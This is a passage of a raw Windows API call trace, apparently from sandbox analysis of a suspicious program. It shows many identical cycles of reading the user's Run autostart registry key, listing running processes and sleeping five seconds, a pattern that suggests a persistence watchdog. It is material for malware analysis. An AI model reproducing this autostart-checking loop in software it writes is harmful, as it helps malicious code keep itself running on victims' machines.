ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.546] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.546] NtClose (Handle=0x154) returned 0x0 [0186.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.551] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.565] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.565] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.565] NtClose (Handle=0x154) returned 0x0 [0186.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.569] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.577] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.577] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.577] NtClose (Handle=0x154) returned 0x0 [0186.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.581] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.593] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.594] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.594] NtClose (Handle=0x154) returned 0x0 [0186.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.598] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.608] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.608] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.608] NtClose (Handle=0x154) returned 0x0 [0186.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.613] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.623] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.624] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.624] NtClose (Handle=0x154) returned 0x0 [0186.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.628] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.648] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.648] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.648] NtClose (Handle=0x154) returned 0x0 [0186.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.652] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.654] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.654] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.654] NtClose (Handle=0x154) returned 0x0 [0186.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.658] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.672] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.672] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.672] NtClose (Handle=0x154) returned 0x0 [0186.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.678] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.685] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.686] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.686] NtClose (Handle=0x154) returned 0x0 [0186.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.689] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.702] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.702] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.703] NtClose (Handle=0x154) returned 0x0 [0186.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.707] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.717] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.717] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.717] NtClose (Handle=0x154) returned 0x0 [0186.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.720] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.733] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.733] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.733] NtClose (Handle=0x154) returned 0x0 [0186.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.738] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.738] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.756] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.757] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.757] NtClose (Handle=0x154) returned 0x0 [0186.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 